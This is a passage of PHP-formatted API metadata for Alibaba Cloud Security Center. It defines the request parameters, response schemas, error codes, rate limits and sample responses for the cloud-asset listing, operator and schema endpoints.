'', 'example' => ''], 'AssetUuid' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'SaleType' => ['type' => 'integer', 'format' => 'int32', 'description' => '', 'title' => '', 'example' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AccountIdNotExist', 'errorMessage' => 'AccountId not exist', 'description' => ''], ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the cloud service asset list', 'summary' => 'Queries the list of cloud service assets.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCloudAssetInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListCloudAssetInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6BF880\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 2,\\n \\"PageSize\\": 100,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 20\\n },\\n \\"Instances\\": [\\n {\\n \\"RegionId\\": \\"cn-hanghzou\\",\\n \\"Vendor\\": 0,\\n \\"AssetType\\": 0,\\n \\"AssetSubType\\": \\"0\\",\\n \\"InstanceId\\": \\"d-uf60vevzkztnflx7cny5\\",\\n \\"InstanceName\\": \\"yztest-l***\\",\\n \\"CreatedTime\\": 1607365213000,\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"AlarmStatus\\": \\"NO\\",\\n \\"RiskStatus\\": \\"NO\\",\\n \\"AssetTypeName\\": \\"ECS\\",\\n \\"AssetSubTypeName\\": \\"SECURITY_GROUP\\",\\n \\"SecurityInfo\\": \\"{\\\\\\"seriousNum\\\\\\":0,\\\\\\"appNum\\\\\\":0,\\\\\\"baselineMedium\\\\\\":0,\\\\\\"remindNum\\\\\\":0,\\\\\\"imageVulNntf\\\\\\":0,\\\\\\"cveNum\\\\\\":0,\\\\\\"vul\\\\\\":0,\\\\\\"uuid\\\\\\":\\\\\\"yuejia-test\\\\\\",\\\\\\"emgNum\\\\\\":0,\\\\\\"weakPWNum\\\\\\":0,\\\\\\"imageMaliciousFileRemind\\\\\\":0,\\\\\\"imageBaselineMedium\\\\\\":0,\\\\\\"laterVulCount\\\\\\":0,\\\\\\"cmsNum\\\\\\":0,\\\\\\"imageMaliciousFileSerious\\\\\\":0,\\\\\\"agentlessMalicious\\\\\\":0,\\\\\\"suspNum\\\\\\":0,\\\\\\"imageBaselineHigh\\\\\\":0,\\\\\\"asapVulCount\\\\\\":0,\\\\\\"imageVulLater\\\\\\":0,\\\\\\"agentlessAll\\\\\\":0,\\\\\\"sysNum\\\\\\":0,\\\\\\"containerLater\\\\\\":0,\\\\\\"containerSuspicious\\\\\\":0,\\\\\\"imageBaselineNum\\\\\\":0,\\\\\\"newSuspicious\\\\\\":0,\\\\\\"nntfVulCount\\\\\\":0,\\\\\\"scaNum\\\\\\":0,\\\\\\"containerNntf\\\\\\":0,\\\\\\"health\\\\\\":0,\\\\\\"trojan\\\\\\":0,\\\\\\"suspicious\\\\\\":0,\\\\\\"imageMaliciousFileSuspicious\\\\\\":0,\\\\\\"containerRemind\\\\\\":0,\\\\\\"baselineLow\\\\\\":0,\\\\\\"imageVulAsap\\\\\\":0,\\\\\\"imageBaselineLow\\\\\\":0,\\\\\\"containerAsap\\\\\\":0,\\\\\\"agentlessBaseline\\\\\\":0,\\\\\\"agentlessVulSca\\\\\\":0,\\\\\\"agentlessVulCve\\\\\\":0,\\\\\\"containerSerious\\\\\\":0,\\\\\\"baselineHigh\\\\\\":0,\\\\\\"account\\\\\\":0,\\\\\\"baselineNum\\\\\\":5}\\",\\n \\"Tags\\": [\\n \\"AI\\"\\n ],\\n \\"VendorUid\\": \\"123xxx\\",\\n \\"VendorUserName\\": \\"testxxx\\",\\n \\"SaleCspm\\": 0,\\n \\"AssetUuid\\": \\"\\",\\n \\"SaleType\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'ListCloudAssetMatchOperators' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasLFD8D4'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'C699E4E4-F2F4-58FC-A949-457FFE59****', 'title' => ''], 'MatchTypeOperators' => [ 'description' => 'The operator type.', 'type' => 'array', 'items' => [ 'description' => 'The operator type.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type used by the operator. Values:'."\n" .'- LIST '."\n" .'- MAP '."\n" .'- STRING '."\n" .'- BOOLEAN '."\n" .'- FLOAT '."\n" .'- DOUBLE '."\n" .'- INTEGER '."\n" .'- LONG ', 'type' => 'string', 'example' => 'LIST', 'title' => ''], 'MatchOperators' => [ 'description' => 'The list of operators.', 'type' => 'array', 'items' => [ 'description' => 'The list of operators.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'Unique name of the operator. Values: - LIST type: '."\n" .'1. LIST_CONTAINS: contains '."\n" .'2. LIST_LENGTH_GT: length greater than '."\n" .'3. LIST_LENGTH_LT: length less than '."\n" .'4. LIST_NOT_CONTAINS: does not contain'."\n" .'- STRING type: '."\n" .'1. STRING_NOT_IN: not in list '."\n" .'2. STRING_EQ: equals '."\n" .'3. STRING_IN: in list '."\n" .'4. STRING_NOT_EQ: not equal'."\n" .'- BOOLEAN type: '."\n" .'1. BOOLEAN_NOT_IN: not in list '."\n" .'2. BOOLEAN_EQ: equals '."\n" .'3. BOOLEAN_IN: in list '."\n" .'4. BOOLEAN_NOT_EQ: not equal'."\n" .'- FLOAT type: 1. FLOAT_NOT_IN: not in list '."\n" .'2. FLOAT_EQ: equals 3. FLOAT_IN: in list '."\n" .'4. FLOAT_NOT_EQ: not equal '."\n" .'5. FLOAT_GT: greater than '."\n" .'6. FLOAT_GTE: greater than or equal to '."\n" .'7. FLOAT_LT: less than '."\n" .'8. FLOAT_LTE: less than or equal to'."\n" .'- DOUBLE type: '."\n" .'1. DOUBLE_NOT_IN: not in list '."\n" .'2. DOUBLE_EQ: equals '."\n" .'3. DOUBLE_IN: in list '."\n" .'4. DOUBLE_NOT_EQ: not equal '."\n" .'5. DOUBLE_GT: greater than '."\n" .'6. DOUBLE_GTE: greater than or equal to 7'."\n" .'. DOUBLE_LT: less than '."\n" .'8. DOUBLE_LTE: less than or equal to'."\n" .'- INTEGER type: '."\n" .'1. INTEGER_NOT_IN: not in list '."\n" .'2. INTEGER_EQ: equals '."\n" .'3. INTEGER_IN: in list '."\n" .'4. INTEGER_NOT_EQ: not equal '."\n" .'5. INTEGER_GT: greater than '."\n" .'6. INTEGER_GTE: greater than or equal to '."\n" .'7. INTEGER_LT: less than '."\n" .'8. INTEGER_LTE: less than or equal to'."\n" .'- LONG type: '."\n" .'1. LONG_NOT_IN: not in list '."\n" .'2. LONG_EQ: equals '."\n" .'3. LONG_IN: in list '."\n" .'4. LONG_NOT_EQ: not equal '."\n" .'5. LONG_GT: greater than '."\n" .'6. LONG_GTE: greater than or equal to '."\n" .'7. LONG_LT: less than '."\n" .'8. LONG_LTE: less than or equal to
'."\n", 'type' => 'string', 'example' => 'LIST_CONTAINS', 'title' => ''], 'Value' => ['description' => 'Operator value. Options: - For LIST type: '."\n" .'1. CONTAINS: contains '."\n" .'2. LENGTH_GT: length greater than '."\n" .'3. LENGTH_LT: length less than '."\n" .'4. NOT_CONTAINS: does not contain'."\n" .'- For STRING type: '."\n" .'1. NOT_IN: not in the list '."\n" .'2. EQ: equals '."\n" .'3. IN: in the list '."\n" .'4. NOT_EQ: does not equal'."\n" .'- For BOOLEAN type: '."\n" .'1. NOT_IN: not in the list '."\n" .'2. EQ: equals '."\n" .'3. IN: in the list '."\n" .'4. NOT_EQ: does not equal'."\n" .'- For FLOAT type: '."\n" .'1. NOT_IN: not in the list '."\n" .'2. EQ: equals '."\n" .'3. IN: in the list '."\n" .'4. NOT_EQ: does not equal '."\n" .'5. GT: greater than '."\n" .'6. GTE: greater than or equal to '."\n" .'7. LT: less than '."\n" .'8. LTE: less than or equal to'."\n" .'- For DOUBLE type: '."\n" .'1. NOT_IN: not in the list '."\n" .'2. EQ: equals '."\n" .'3. IN: in the list '."\n" .'4. NOT_EQ: does not equal '."\n" .'5. GT: greater than '."\n" .'6. GTE: greater than or equal to '."\n" .'7. LT: less than '."\n" .'8. LTE: less than or equal to'."\n" .'- For INTEGER type: '."\n" .'1. NOT_IN: not in the list '."\n" .'2. EQ: equals '."\n" .'3. IN: in the list '."\n" .'4. NOT_EQ: does not equal '."\n" .'5. GT: greater than '."\n" .'6. GTE: greater than or equal to '."\n" .'7. LT: less than '."\n" .'8. LTE: less than or equal to'."\n" .'- For LONG type: '."\n" .'1. NOT_IN: not in the list '."\n" .'2. EQ: equals '."\n" .'3. IN: in the list '."\n" .'4. NOT_EQ: does not equal '."\n" .'5. GT: greater than '."\n" .'6. GTE: greater than or equal to '."\n" .'7. LT: less than '."\n" .'8. LTE: less than or equal to', 'type' => 'string', 'example' => 'CONTAINS', 'title' => ''], 'ShowName' => ['description' => 'Operator display name. Values: '."\n" .'- For LIST type: '."\n" .'1. Contains: includes '."\n" .'2. SizeGreaterThan: size greater than '."\n" .'3. SizeLessThan: size less than '."\n" .'4. NotContains: does not include'."\n" .'- For STRING type: '."\n" .'1. NotIn: not in the list '."\n" .'2. Equals: equals '."\n" .'3. In: in the list '."\n" .'4. NotEquals: does not equal'."\n" .'- For BOOLEAN type: '."\n" .'1. NotIn: not in the list '."\n" .'2. Equals: equals '."\n" .'3. In: in the list '."\n" .'4. NotEquals: does not equal'."\n" .'- For FLOAT type: '."\n" .'1. NotIn: not in the list '."\n" .'2. Equals: equals '."\n" .'3. In: in the list '."\n" .'4. NotEquals: does not equal '."\n" .'5. `>`: greater than '."\n" .'6. `>=`: greater than or equal to '."\n" .'7. <: less than '."\n" .'8. <=: less than or equal to'."\n" .'- For DOUBLE type: '."\n" .'1. NotIn: not in the list '."\n" .'2. Equals: equals '."\n" .'3. In: in the list '."\n" .'4. NotEquals: does not equal '."\n" .'5. `>`: greater than '."\n" .'6. `>=`: greater than or equal to '."\n" .'7. <: less than '."\n" .'8. <=: less than or equal to (Note: There seems to be a repetition here, likely meant to be \'<=\' for \'less than or equal to\')'."\n" .'- For INTEGER type: '."\n" .'1. NotIn: not in the list '."\n" .'2. Equals: equals '."\n" .'3. In: in the list '."\n" .'4. NotEquals: does not equal '."\n" .'5. `>`: greater than '."\n" .'6. `>=`: greater than or equal to '."\n" .'7. <: less than '."\n" .'8. <=: less than or equal to'."\n" .'- For LONG type: '."\n" .'1. NotIn: not in the list '."\n" .'2. Equals: equals '."\n" .'3. In: in the list '."\n" .'4. NotEquals: does not equal '."\n" .'5. >: greater than '."\n" .'6. >=: greater than or equal to '."\n" .'7. <: less than '."\n" .'8. <=: less than or equal to'."\n" .'- For INTEGER type (repeated): '."\n" .'1. NotIn: not in the list '."\n" .'2. Equals: equals '."\n" .'3. In: in the list '."\n" .'4. NotEquals: does not equal '."\n" .'5. `>`: greater than '."\n" .'6. `>=`: greater than or equal to '."\n" .'7. <: less than '."\n" .'8. <=: less than or equal to', 'type' => 'string', 'example' => 'Contains', 'title' => ''], 'InputPattern' => ['description' => 'Operation data types. Values: '."\n" .'- LIST type: '."\n" .'1. For Name as LIST_CONTAINS, the value is: LIST '."\n" .'2. For Name as LIST_LENGTH_GT, the value is: PRIMITIVE '."\n" .'3. For Name as LIST_LENGTH_LT, the value is: PRIMITIVE '."\n" .'4. For Name as LIST_NOT_CONTAINS, the value is: LIST'."\n" .'- STRING type: '."\n" .'1. For Name as STRING_NOT_IN, the value is: LIST '."\n" .'2. For Name as STRING_EQ, the value is: PRIMITIVE '."\n" .'3. For Name as STRING_IN, the value is: LIST '."\n" .'4. For Name as STRING_NOT_EQ, the value is: PRIMITIVE'."\n" .'- BOOLEAN type: '."\n" .'1. For Name as BOOLEAN_NOT_IN, the value is: LIST '."\n" .'2. For Name as BOOLEAN_EQ, the value is: PRIMITIVE '."\n" .'3. For Name as BOOLEAN_IN, the value is: LIST '."\n" .'4. For Name as BOOLEAN_NOT_EQ, the value is: PRIMITIVE'."\n" .'- FLOAT type: '."\n" .'1. For Name as FLOAT_NOT_IN, the value is: LIST '."\n" .'2. For Name as FLOAT_EQ, the value is: PRIMITIVE '."\n" .'3. For Name as FLOAT_IN, the value is: LIST '."\n" .'4. For Name as FLOAT_NOT_EQ, the value is: PRIMITIVE '."\n" .'5. For Name as FLOAT_GT, the value is: PRIMITIVE '."\n" .'6. For Name as FLOAT_GTE, the value is: PRIMITIVE '."\n" .'7. For Name as FLOAT_LT, the value is: PRIMITIVE '."\n" .'8. For Name as FLOAT_LTE, the value is: PRIMITIVE'."\n" .'- DOUBLE type: '."\n" .'1. For Name as DOUBLE_NOT_IN, the value is: LIST '."\n" .'2. For Name as DOUBLE_EQ, the value is: PRIMITIVE '."\n" .'3. For Name as DOUBLE_IN, the value is: LIST '."\n" .'4. For Name as DOUBLE_NOT_EQ, the value is: PRIMITIVE '."\n" .'5. For Name as DOUBLE_GT, the value is: PRIMITIVE '."\n" .'6. For Name as DOUBLE_GTE, the value is: PRIMITIVE '."\n" .'7. For Name as DOUBLE_LT, the value is: PRIMITIVE 8. For Name as DOUBLE_LTE, the value is: PRIMITIVE'."\n" .'- INTEGER type: '."\n" .'1. For Name as INTEGER_NOT_IN, the value is: LIST '."\n" .'2. For Name as INTEGER_EQ, the value is: PRIMITIVE '."\n" .'3. For Name as INTEGER_IN, the value is: LIST '."\n" .'4. For Name as INTEGER_NOT_EQ, the value is: PRIMITIVE '."\n" .'5. For Name as INTEGER_GT, the value is: PRIMITIVE '."\n" .'6. For Name as INTEGER_GTE, the value is: PRIMITIVE '."\n" .'7. For Name as INTEGER_LT, the value is: PRIMITIVE '."\n" .'8. For Name as INTEGER_LTE, the value is: PRIMITIVE'."\n" .'- LONG type: '."\n" .'1. For Name as LONG_NOT_IN, the value is: LIST '."\n" .'2. For Name as LONG_EQ, the value is: PRIMITIVE '."\n" .'3. For Name as LONG_IN, the value is: LIST '."\n" .'4. For Name as LONG_NOT_EQ, the value is: PRIMITIVE '."\n" .'5. For Name as LONG_GT, the value is: PRIMITIVE '."\n" .'6. For Name as LONG_GTE, the value is: PRIMITIVE '."\n" .'7. For Name as LONG_LT, the value is: PRIMITIVE '."\n" .'8. For Name as LONG_LTE, the value is: PRIMITIVE'."\n" .'- INTEGER type (repeated): '."\n" .'1. For Name as INTEGER_NOT_IN, the value is: LIST '."\n" .'2. For Name as INTEGER_EQ, the value is: PRIMITIVE '."\n" .'3. For Name as INTEGER_IN, the value is: LIST '."\n" .'4. For Name as INTEGER_NOT_EQ, the value is: PRIMITIVE '."\n" .'5. For Name as INTEGER_GT, the value is: PRIMITIVE '."\n" .'6. For Name as INTEGER_GTE, the value is: PRIMITIVE '."\n" .'7. For Name as INTEGER_LT, the value is: PRIMITIVE '."\n" .'8. For Name as INTEGER_LTE, the value is: PRIMITIVE', 'type' => 'string', 'example' => 'PRIMITIVE', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AccountIdNotExist', 'errorMessage' => 'AccountId not exist', 'description' => ''], ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Get cloud asset data operator list', 'summary' => 'Gets the list of cloud product configuration rule operators.', 'description' => 'Gets the list of cloud asset data operators.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCloudAssetMatchOperators'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCloudAssetMatchOperators', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"RequestId\\": \\"C699E4E4-F2F4-58FC-A949-457FFE59****\\",\\n \\"MatchTypeOperators\\": [\\n {\\n \\"Type\\": \\"LIST\\",\\n \\"MatchOperators\\": [\\n {\\n \\"Name\\": \\"LIST_CONTAINS\\",\\n \\"Value\\": \\"CONTAINS\\",\\n \\"ShowName\\": \\"Contains\\",\\n \\"InputPattern\\": \\"PRIMITIVE\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'ListCloudAssetSchemas' => [ 'summary' => 'Get the list of cloud product asset structure', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasLFD8D4'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'maximum' => '100', 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'CloudAssetTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of cloud assets.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The types of cloud assets.'."\n", 'type' => 'object', 'properties' => [ 'AssetType' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'* **0**: Elastic Compute Service (ECS)'."\n" .'* **1**: Server Load Balancer (SLB)'."\n" .'* **3**: ApsaraDB RDS'."\n" .'* **4**: ApsaraDB for MongoDB (MongoDB)'."\n" .'* **5**: ApsaraDB for Redis (Redis)'."\n" .'* **6**: Container Registry'."\n" .'* **8**: Container Service for Kubernetes (ACK)'."\n" .'* **9**: Virtual Private Cloud (VPC)'."\n" .'* **11**: ActionTrail'."\n" .'* **12**: Alibaba Cloud CDN (CDN)'."\n" .'* **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .'* **14**: Apsara Devops'."\n" .'* **16**: Anti-DDoS'."\n" .'* **17**: Web Application Firewall (WAF)'."\n" .'* **18**: Object Storage Service (OSS)'."\n" .'* **19**: PolarDB'."\n" .'* **20**: ApsaraDB RDS for PostgreSQL'."\n" .'* **21**: Microservices Engine (MSE)'."\n" .'* **22**: File Storage NAS (NAS)'."\n" .'* **23**: Data Security Center (DSC)'."\n" .'* **24**: Elastic IP Address (EIP)'."\n" .'* **25**: IDaaS EIAM'."\n" .'* **26**: PolarDB-X'."\n" .'* **27**: Elasticsearch', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service or asset. Valid values:'."\n" ."\n" .'* **0**: ECS'."\n" ."\n" .' * **0**: instance'."\n" .' * **1**: disk (storage)'."\n" .' * **2**: security group'."\n" ."\n" .'* **1**: SLB'."\n" ."\n" .' * **0**: SLB'."\n" .' * **1**: Application Load Balancer (ALB)'."\n" ."\n" .'* **3**: ApsaraDB RDS'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **4**: MongoDB'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **5**: Redis'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **6**: Container Registry'."\n" ."\n" .' * **1**: Enterprise Edition'."\n" .' * **2**: Personal Edition'."\n" ."\n" .'* **8**: ACK'."\n" ."\n" .' * **0**: cluster'."\n" ."\n" .'* **9**: VPC'."\n" ."\n" .' * **0**: NAT gateway'."\n" .' * **1**: Elastic IP address (EIP)'."\n" .' * **2**: VPN'."\n" .' * **3**: VPC Flow Logs'."\n" ."\n" .'* **11**: ActionTrail'."\n" ."\n" .' * **0**: trail'."\n" ."\n" .'* **12**: CDN'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" ."\n" .' * **0**: certificate'."\n" ."\n" .'* **14**: Apsara Devops'."\n" ."\n" .' * **0**: organization'."\n" ."\n" .'* **16**: Anti-DDoS'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **17**: WAF'."\n" ."\n" .' * **0**: domain name'."\n" ."\n" .'* **18**: OSS'."\n" ."\n" .' * **0**: bucket'."\n" ."\n" .'* **19**: PolarDB'."\n" ."\n" .' * **0**: cluster'."\n" ."\n" .'* **20**: ApsaraDB RDS for PostgreSQL'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **21**: MSE'."\n" ."\n" .' * **0**: cluster'."\n" ."\n" .'* **22**: NAS'."\n" ."\n" .' * **0**: file system'."\n" ."\n" .'* **23**: DSC'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **24**: EIP'."\n" ."\n" .' * **0**: Anycast EIP'."\n" ."\n" .'* **25**: IDaaS EIAM'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **26**: PolarDB-X'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **27**: Elasticsearch'."\n" ."\n" .' * **0**: instance'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'Vendor' => ['description' => 'The server type. Valid values:'."\n" ."\n" .'* **0**: a cloud asset provided by Alibaba Cloud'."\n" .'* **1**: a cloud asset outside Alibaba Cloud'."\n" .'* **2**: a cloud asset in a data center'."\n" .'* **3**, **4**, **5**, and **7**: a cloud asset provided by a third-party service provider'."\n" .'* **8**: a lightweight cloud asset'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'DataNames', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of asset data names', 'type' => 'array', 'items' => ['description' => 'Asset data name.', 'type' => 'string', 'required' => false, 'example' => 'ACS_ECS_Disk', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'AssociatedDataOnly', 'in' => 'query', 'schema' => ['description' => 'Whether to filter out attributes that can be associated with other assets.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requesting and receiving messages, with a default value of **zh**. The values can be: - **zh**: Chinese - **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Values: '."\n" .'- **true**: The call was successful. '."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'Current page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '54', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CloudAssetSchemas' => [ 'description' => 'List of asset structure definitions', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'DataName' => ['description' => 'Asset structure definition name', 'type' => 'string', 'example' => 'ACS_ECS_Disk', 'title' => ''], 'Vendor' => ['description' => 'The source of the server. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud.'."\n" .'* **1**: a third-party cloud server'."\n" .'* **2**: a server in a data center'."\n" .'* **3**, **4**, **5**, and **7**: other cloud asset'."\n" .'* **8**: a lightweight asset', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud asset. Valid values:'."\n" ."\n" .'* **0**: Elastic Compute Service (ECS).'."\n" .'* **1**: Server Load Balancer (SLB).'."\n" .'* **3**: ApsaraDB RDS.'."\n" .'* **4**: ApsaraDB for MongoDB.'."\n" .'* **5**: ApsaraDB for Redis.'."\n" .'* **6**: Container Registry.'."\n" .'* **8**: Container Service for Kubernetes.'."\n" .'* **9**: Virtual Private Cloud (VPC).'."\n" .'* **11**: ActionTrail.'."\n" .'* **12**: Alibaba Cloud CDN (CDN).'."\n" .'* **13**: Certificate Management Service.'."\n" .'* **14**: Apsara Devops.'."\n" .'* **15**: Resource Access Management (RAM).'."\n" .'* **16**: Anti-DDoS.'."\n" .'* **17**: Web Application Firewall (WAF).'."\n" .'* **18**: Object Storage Service (OSS).'."\n" .'* **19**: PolarDB.'."\n" .'* **20**: ApsaraDB RDS for PostgreSQL.'."\n" .'* **21**: Microservices Engine (MSE).'."\n" .'* **22**: File Storage NAS (NAS).'."\n" .'* **23**: Data Security Center (DSC).'."\n" .'* **24**: Elastic IP Address (EIP).'."\n" .'* **25**: Identity as a Service (IDaaS)-Employee Identity and Access Management (EIAM).'."\n" .'* **26**: PolarDB-X.'."\n" .'* **27**: Elasticsearch.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'Subtype of the cloud product.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Properties' => ['description' => 'Current asset structure definition text.', 'type' => 'string', 'example' => '[{\\"associatedData\\":[{\\"assetSubType\\":100,\\"assetType\\":0,\\"dataName\\":\\"ACS_ECS_Instance\\",\\"properties\\":[{\\"name\\":\\"InstanceId\\",\\"path\\":\\"InstanceId\\"}],\\"vendor\\":0}],\\"description\\":\\"The ID of the instance to which the disk is attached.\\",\\"example\\":\\"i-bp67acfmxazb4q****\\",\\"name\\":\\"InstanceId\\",\\"type\\":\\"STRING\\",\\"withAssociatedData\\":true},{\\"description\\":\\"Disk name\\",\\"example\\":\\"testDiskName\\",\\"name\\":\\"DiskName\\",\\"type\\":\\"STRING\\"},{\\"description\\":\\"Only encrypted disks\\",\\"example\\":\\"false\\",\\"name\\":\\"Encrypted\\",\\"type\\":\\"BOOLEAN\\"},{\\"description\\":\\"Disk status\\",\\"example\\":\\"In_use\\",\\"name\\":\\"Status\\",\\"type\\":\\"STRING\\"},{\\"description\\":\\"Disk category\\",\\"example\\":\\"cloud_ssd\\",\\"name\\":\\"Category\\",\\"type\\":\\"STRING\\"},{\\"description\\":\\"Disk type\\",\\"example\\":\\"system\\",\\"name\\":\\"Type\\",\\"type\\":\\"STRING\\"},{\\"description\\":\\"Specifies whether to set an automatic snapshot policy for the disk.\\",\\"example\\":\\"false\\",\\"name\\":\\"EnableAutomatedSnapshotPolicy\\",\\"type\\":\\"BOOLEAN\\"},{\\"description\\":\\"The ID of the automatic snapshot policy.\\",\\"example\\":\\"sp-bp67acfmxazb4p****\\",\\"name\\":\\"AutoSnapshotPolicyId\\",\\"type\\":\\"STRING\\"},{\\"description\\":\\"Disk, local disk, or elastic ephemeral disk ID\\",\\"example\\":\\"d-bp18um4r4f2fve24****\\",\\"name\\":\\"DiskId\\",\\"type\\":\\"STRING\\"}]', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AccountIdNotExist', 'errorMessage' => 'AccountId not exist', 'description' => ''], ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 